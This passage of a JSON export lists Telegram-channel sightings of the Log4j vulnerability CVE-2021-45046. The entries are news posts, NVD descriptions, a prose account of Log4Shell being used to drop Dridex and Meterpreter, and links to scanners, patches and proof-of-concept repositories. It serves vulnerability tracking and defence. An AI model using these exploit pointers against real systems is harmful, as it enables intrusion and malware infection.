\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c. 
\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u044b\u0437\u044b\u0432\u0430\u043b\u0430 \u043e\u0442\u043a\u0430\u0437 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438 \u0438 \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0432 \u0432\u0438\u0434\u0435 \u0437\u0430\u0446\u0438\u043a\u043b\u0438\u0432\u0430\u043d\u0438\u044f \u0438 \u0430\u0432\u0430\u0440\u0438\u0439\u043d\u043e\u0433\u043e \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0451\u043d\u043d\u044b\u0445 \u0441\u0442\u0440\u043e\u043a. \u041d\u043e \u0432\u0440\u043e\u0434\u0435 \u043a\u0430\u043a \u0441 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u044b\u043c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435\u043c Log4j 2.17, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0438 \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u0441 Java 8.\n\n\u0411\u0443\u043a\u0432\u0430\u043b\u044c\u043d\u043e \u0432\u0447\u0435\u0440\u0430 Cryptolaemus \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0438 \u043e \u043d\u043e\u0432\u043e\u043c \u0441\u043f\u043e\u0441\u043e\u0431\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f Log4Shell \u0434\u043b\u044f \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u0431\u0430\u043d\u043a\u043e\u0432\u0441\u043a\u0438\u043c \u0442\u0440\u043e\u044f\u043d\u043e\u043c \u00abDridex\u00bb \u0438\u043b\u0438 \u00abMeterpreter\u00bb.\n\n\u0418 
\u0434\u0430\u043d\u043d\u0430\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0431\u043e\u043b\u0435\u0435 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u0430, \u0432\u0435\u0434\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0434\u0430\u0436\u0435 \u043d\u0435 \u043f\u0440\u0438\u0434\u0435\u0442\u0441\u044f \u0437\u043d\u0430\u0442\u044c \u043a\u0430\u043a\u0430\u044f \u0443 \u0436\u0435\u0440\u0442\u0432\u044b \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430. \u0412\u0441\u0435 \u043f\u043e\u0442\u043e\u043c\u0443, \u0447\u0442\u043e Java \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0444\u0430\u0439\u043b HTA, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0438 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442 \u0441\u0430\u043c \u0442\u0440\u043e\u044f\u043d Dridex, \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0439 \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 Windows. 
\u041e\u0434\u043d\u0430\u043a\u043e \u0435\u0441\u043b\u0438 \u044d\u0442\u043e \u043d\u0435 \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0438 \u043a\u043e\u043c\u0430\u043d\u0434\u044b Windows \u043d\u0435 \u043c\u043e\u0433\u0443\u0442 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u0441\u044f \u0438\u043b\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u0441\u044f, \u0442\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u0435\u0442\u0441\u044f, \u0447\u0442\u043e \u0434\u0430\u043d\u043d\u0430\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u043d\u0435 \u043f\u043e\u0434\u0445\u043e\u0434\u0438\u0442 \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u044d\u0442\u0438\u0445 \u0437\u0430\u0434\u0430\u0447 \u0438 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432 \u043d\u0430 Python \u0434\u043b\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 Meterpreter, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043a\u0430\u043a \u0440\u0430\u0437 \u043f\u0440\u0438\u0441\u043f\u043e\u0441\u043e\u0431\u043b\u0435\u043d \u0434\u043b\u044f \u041e\u0421 Linux / Unix.\n\n\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 Log4j \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0441\u0443\u0431\u044a\u0435\u043a\u0442\u0430\u043c\u0438, \u0443\u0433\u0440\u043e\u0436\u0430\u044e\u0449\u0438\u043c\u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0448\u0438\u0440\u043e\u043a\u0438\u0439 \u0441\u043f\u0435\u043a\u0442\u0440 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c, \u043d\u0435\u0443\u0434\u0438\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e, \u0447\u0442\u043e \u0431\u043e\u043b\u0435\u0435 
\u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u043d\u0430\u0447\u043d\u0443\u0442 \u043d\u0430\u0446\u0435\u043b\u0438\u0432\u0430\u0442\u044c\u0441\u044f \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c.\n\u0410 \u043d\u0430\u043c \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0442\u044c\u0441\u044f \u0434\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 \u0441 \u043d\u043e\u0432\u044b\u043c\u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f\u043c\u0438, \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u0442\u044c Log4j \u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432\u0441\u0435\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u043c\u0438 \u0441\u043a\u0430\u043d\u0435\u0440\u0430\u043c\u0438, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, log4jScanner.\n@NeKaspersky", "creation_timestamp": "2021-12-22T15:51:02.000000Z"}, {"uuid": "11be1803-675d-4278-bc91-031cad2401b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/cibsecurity/48659", "content": "\u203c CVE-2021-4125 \u203c\n\nIt was found that the original fix for log4j CVE-2021-44228 and CVE-2021-45046 in the OpenShift metering hive containers was incomplete, as not all JndiLookup.class files were removed. 
This CVE only applies to the OpenShift Metering hive container images, shipped in OpenShift 4.8, 4.7 and 4.6.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-08-24T20:22:51.000000Z"}, {"uuid": "e331e314-9711-462c-97f4-67373a7689a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/thehackernews/1730", "content": "URGENT: Apache Foundation has issued a new patch (CVE-2021-45046) for Log4j utility after the previous patch for the recently disclosed Log4Shell exploit (CVE-2021-44228) was deemed incomplete in certain non-default configurations.\n\nDetails: https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html", "creation_timestamp": "2021-12-15T06:36:47.000000Z"}, {"uuid": "2b351ad9-a5b6-4f8a-9a3c-1dd3ad605b63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/cibsecurity/33979", "content": "\u203c CVE-2021-45046 \u203c\n\nIt was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration such as to set the system property `log4j2.noFormatMsgLookup` to `true` do NOT mitigate this specific vulnerability. 
Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. This issue can be mitigated in prior releases (&lt;2.16.0) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-12-14T22:14:54.000000Z"}, {"uuid": "516dfd9b-701e-4b94-b455-1df2571a6643", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/cibsecurity/44725", "content": "\u203c CVE-2022-33915 \u203c\n\nVersions of the Amazon AWS Apache Log4j hotpatch package before log4j-cve-2021-44228-hotpatch-1.3.5 are affected by a race condition that could lead to a local privilege escalation. This Hotpatch package is not a replacement for updating to a log4j version that mitigates CVE-2021-44228 or CVE-2021-45046; it provides a temporary mitigation to CVE-2021-44228 by hotpatching the local Java virtual machines. To do so, it iterates through all running Java processes, performs several checks, and executes the Java virtual machine with the same permissions and capabilities as the running process to load the hotpatch. 
A local user could cause the hotpatch script to execute a binary with elevated privileges by running a custom java process that performs exec() of an SUID binary after the hotpatch has observed the process path and before it has observed its effective user ID.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-17T16:23:35.000000Z"}, {"uuid": "7de24c5a-c0b1-455b-a638-857fb95ef054", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/thehackernews/1734", "content": "Attackers have started exploiting the 2nd Log4J vulnerability (CVE-2021-45046), while a third vulnerability has already been reported and its technical details are expected to be published soon.\n\nDetails + PoC for 3rd: https://thehackernews.com/2021/12/hackers-begin-exploiting-second-log4j.html", "creation_timestamp": "2021-12-16T07:29:41.000000Z"}, {"uuid": "2d5b7b8b-7af9-499f-a805-5f73fc21cee2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/thehackernews/3303", "content": "Heads up, everyone! \n \nCISA has issued an advisory warning of active exploitation of three known vulnerabilities, including CVE-2023-1389 (TP-Link Archer AX-21), CVE-2021-45046 (Apache Log4j2) and CVE-2023-21839 (Oracle WebLogic). 
\n \nDetails: https://thehackernews.com/2023/05/active-exploitation-of-tp-link-apache.html", "creation_timestamp": "2023-05-02T07:47:51.000000Z"}, {"uuid": "e1941044-ae32-4fff-af23-7968ff8b70c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/BlueRedTeam/1509", "content": "#CVE-2021\n#Log4j \nSamples of log4j library versions to help log4j scanners / detectors improve their accuracy for detecting CVE-2021-45046 and CVE-2021-44228.\n\nhttps://github.com/mergebase/log4j-samples\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T22:06:43.000000Z"}, {"uuid": "7f2a9ef1-fd11-442b-9927-b66bbba11362", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/BlueRedTeam/1501", "content": "#CVE-2021\n#log4j2 \nScanner local em Python para localizar e identificar vers\u00f5es vulner\u00e1veis do Log4j2 em arquivos no disco com an\u00e1lise interna de arquivos JAR (CVE-2021-44228 e CVE-2021-45046)\n\nhttps://github.com/andalik/log4j-scanner\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T15:51:01.000000Z"}, {"uuid": "ffdd7144-5dbc-4cf2-82ba-b00d04e09e19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/BlueRedTeam/1512", "content": "#Exploit \n1. CVE-2021-45046:\nLog4j 2.15.0 stills allows for exfiltration of sensitive data\nhttps://www.praetorian.com/blog/log4j-2-15-0-stills-allows-for-exfiltration-of-sensitive-data\n\n2. 
CVE-2021-41962:\nStored XSS in Vehicle Service Management System 1.0\nin Sourcecodester\nhttps://github.com/lohyt/-CVE-2021-41962\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T07:40:04.000000Z"}, {"uuid": "90fb255a-7df1-47ab-9dd0-c29d486e9be7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/5049", "content": "#hardening\n#Automotive_Security\nExamining Log4j Vulnerabilities in Connected Cars and Charging Stations\nhttps://www.trendmicro.com/en_us/research/21/l/examining-log4j-vulnerabilities-in-connected-cars.html\n]-&gt; Guide: How To Detect and Mitigate the Log4Shell Vulnerability (CVE-2021-44228/CVE-2021-45046)\nhttps://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide", "creation_timestamp": "2024-10-04T07:31:39.000000Z"}, {"uuid": "3c83c4ec-b29f-44b7-a24e-d30b9b335ffd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1463", "content": "#CVE-2021\n#Log4j \nLog4j 2.15.0 Privilege Escalation -- CVE-2021-45046\n\nhttps://github.com/cckuailong/Log4j_CVE-2021-45046\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T07:07:01.000000Z"}, {"uuid": "0a6a5ebb-2d74-41ac-9bac-e2a0884f1420", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1473", "content": "#CVE-2021\n\nReplicating CVE-2021-45046\n\nhttps://github.com/tejas-nagchandi/CVE-2021-45046\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T18:04:31.000000Z"}, {"uuid": "08b6cd0c-4f1d-4ae4-8a19-3a2aa2d3fbae", "vulnerability_lookup_origin": 
"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/BlueRedTeam/1504", "content": "#CVE-2021\n#log4j2\nScanner local em Python para varredura e localiza\u00e7\u00e3o de vers\u00f5es vulner\u00e1veis do Log4j2 em arquivos no disco, contemplando an\u00e1lise interna de arquivos JAR (CVE-2021-44228 e CVE-2021-45046)\n\nhttps://github.com/andalik/log4j-filescan\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T17:03:26.000000Z"}, {"uuid": "ba7fd7b3-a320-4bfc-bf74-b21f5e5e1fb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/BlueRedTeam/1505", "content": "#CVE-2021\n#Log4j \nBurp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046\n\nhttps://github.com/DXC-StrikeForce/Burp-Log4j-HammerTime\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T18:26:15.000000Z"}, {"uuid": "e094f2a9-968e-41b0-b299-7abaffe0a416", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/BlueRedTeam/1527", "content": "#CVE-2021\n#Log4j \nProvide patched version of Log4J against CVE-2021-44228 and CVE-2021-45046 as well as a script to manually patch it yourself\n\nhttps://github.com/Aschen/log4j-patched\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T21:10:01.000000Z"}, {"uuid": "d53159b8-b9fa-41a1-b560-f1786b431045", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/BlueRedTeam/1495", "content": "#CVE-2021\n#Log4j \nBurp extension to identify Log4j vulnerabilities CVE-2021-44228 and 
CVE-2021-45046\n\nhttps://github.com/DXC-StrikeForce/Burp-Log4Shell-Active-Scanner\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T14:03:36.000000Z"}, {"uuid": "57a0f2dd-f061-4bc5-9b85-2753ad98369f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/BlueRedTeam/1496", "content": "#CVE-2021\n#Log4j \nBurp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 an CVE-2021-45046\n\nhttps://github.com/freskimo/Burp-Log4j-HammerTime\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T15:36:42.000000Z"}, {"uuid": "85edd762-5c99-45ee-8f1b-627c169a36e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/BlueRedTeam/1514", "content": "#Blue_Team\n1. LOLBins Are No Laughing Matter:\nHow Attackers Operate Quietly\nhttps://www.uptycs.com/blog/lolbins-are-no-laughing-matter\n2. 
Protection against CVE-2021-45046, the additional Log4j RCE vulnerability\nhttps://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T07:46:01.000000Z"}, {"uuid": "481a4ecd-6000-453d-9035-4b227f34009a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/BlueRedTeam/1533", "content": "#CVE-2021\n#Log4j \nA simple script to remove Log4J JndiLookup.class from jars in a given directory, to temporarily protect from CVE-2021-45046 and CVE-2021-44228.\n\nhttps://github.com/lukepasek/log4jjndilookupremove\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T22:38:24.000000Z"}, {"uuid": "0384670b-8e21-4c2e-b6d6-321a27363967", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/BlueRedTeam/1536", "content": "#CVE-2021\n#Log4j \ncan find, analyse and patch Log4J files because of CVE-2021-44228, CVE-2021-45046\n\nhttps://github.com/DANSI/PowerShell-Log4J-Scanner\n@BlueRedTeam", "creation_timestamp": "2021-12-18T01:57:32.000000Z"}, {"uuid": "ee8f5a46-ccf6-427a-891b-c26226c6d7ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/BlueRedTeam/1547", "content": "#CVE-2021\n#Log4Shell\nSearches filesystem for CVE-2021-44228 and CVE-2021-45046 vulnerable instances, including embedded (jar/war/zip) packaged ones.\n\nhttps://github.com/HynekPetrak/log4shell_finder\n\n@BlueRedTeam", "creation_timestamp": "2021-12-19T09:50:02.000000Z"}, {"uuid": "6d6edfbd-ea9f-4d60-a2ce-69116975e72b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", 
"author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/BlueRedTeam/1548", "content": "#CVE-2021\n#log4j \nVulerability analysis, patch management and exploitation tool CVE-2021-44228 / CVE-2021-45046 / CVE-2021-4104\n\nhttps://github.com/TheInterception/Log4J-Simulation-Tool\n\n@BlueRedTeam", "creation_timestamp": "2021-12-19T10:03:53.000000Z"}, {"uuid": "bf3bbc22-ca07-437d-bdec-d2b58bff6c82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/BlueRedTeam/1557", "content": "#CVE-2021\n#Log4j \n#CheetSheet\n\nLog4J CVE-2021-44228 : Mitigation Cheat Sheet\n\nhttps://github.com/thedevappsecguy/Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105\n\n@BlueRedTeam", "creation_timestamp": "2021-12-22T10:05:35.000000Z"}, {"uuid": "3a8e8536-270a-45c9-8142-7b3e272ee9a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/5115", "content": "#Analytics\nTop 10 Most Used Vulns of the Month (Dec 1-31)\nCVE-2021-44228 - Apache Log4j2\nCVE-2021-45046 - Apache Log4j DoS\nCVE-2021-42278, CVE-2021-42287 - AD Domain Services EoP Vulnerability\nCVE-2021-44832 - Apache Log4j 2.17.0\nCVE-2021-45105 - DoS via Uncontrolled Recursion in Log4j Strsubstitutor\nCVE-2021-43798 - Grafana 8.x Path Traversal\nCVE-2021-44077 - PreAuth RCE in ManageEngine ServiceDesk Plus\nCVE-2021-4422 - Log4j vulnerability\nCVE-2021-44515 - Zoho ManageEngine Desktop Central Pre-auth RCE", "creation_timestamp": "2024-10-21T16:08:53.000000Z"}, {"uuid": "141979d9-132f-44da-b206-7228e1ef612a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", 
"vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/4997", "content": "#Blue_Team_Techniques\n1. LOLBins Are No Laughing Matter:\nHow Attackers Operate Quietly\nhttps://www.uptycs.com/blog/lolbins-are-no-laughing-matter\n2. Protection against CVE-2021-45046, the additional Log4j RCE vulnerability\nhttps://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability", "creation_timestamp": "2021-12-17T11:07:01.000000Z"}, {"uuid": "c5aff9f3-6ca8-495e-95b8-9fa04c0e099f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/4991", "content": "#exploit\n1. CVE-2021-45046:\nLog4j 2.15.0 stills allows for exfiltration of sensitive data\nhttps://www.praetorian.com/blog/log4j-2-15-0-stills-allows-for-exfiltration-of-sensitive-data\n\n2. CVE-2021-41962:\nStored XSS in Vehicle Service Management System 1.0 in Sourcecodester\nhttps://github.com/lohyt/-CVE-2021-41962", "creation_timestamp": "2024-10-21T16:03:37.000000Z"}, {"uuid": "08ab8a01-242e-4172-be83-0d4c9ba0e7ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/LearnExploit/3135", "content": "\u06a9\u0634\u0641 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u062f\u0648\u0645 \u0648 \u062c\u062f\u06cc\u062f \u062f\u0631 \u0648\u0631\u0698\u0646 2.15 \u062f\u0631 Log4j \u0628\u0627 \u0634\u0646\u0627\u0633\u0647 CVE-2021-45046 \n\n\u0627\u06cc\u0646 \u0628\u0627\u0631 \u0628\u0647 \u062c\u0627\u06cc Log4shell \u0645\u0627 Log4dos \u0631\u0648 \u0634\u0627\u0647\u062f \u0647\u0633\u062a\u06cc\u0645 \u06a9\u0647 \u0631\u0648\u06cc \u062a\u0627\u0631\u06af\u062a \u0645\u06cc\u062e\u0648\u0631\u0647 \n\n\u0628\u0627\u06cc\u062f 
\u0628\u0647 \u0648\u0631\u0698\u0646 2.16 \u0627\u067e\u062f\u06cc\u062a \u06a9\u0646\u06cc\u062f \u06cc\u0627 Jndi \u0631\u0648 \u06a9\u0644\u0627 \u063a\u06cc\u0631\u0641\u0639\u0627\u0644 \u06a9\u0646\u06cc\u062f . \n\n\u062a\u0645\u0627\u0645\u06cc \u0646\u0633\u062e\u0647 \u0647\u0627\u06cc Log4j \u0627\u0632 Beta9-2.0 \u062a\u0627 2.12.1 /2.13.0 \u0648 2.15.0 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 \u0647\u0633\u062a\u0646\u062f \n\n#Log4J #Log4dos #Log4shell\n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2022-01-18T19:37:12.000000Z"}, {"uuid": "780a4c3f-ebb6-4f17-9529-0b1297186d67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/tarnkappe/4075", "content": "\ud83d\udcec Log4Shell Patch per Exploit (CVE-2021-44228 + CVE-2021-45046) #Artikel #Hacking #ChrisThompson #ForrestAllison #FreeWortley #log4j #Log4Shell #Patchploit https://tarnkappe.info/log4shell-patch-per-exploit-cve-2021-44228-cve-2021-45046/", "creation_timestamp": "2021-12-16T22:18:05.000000Z"}]}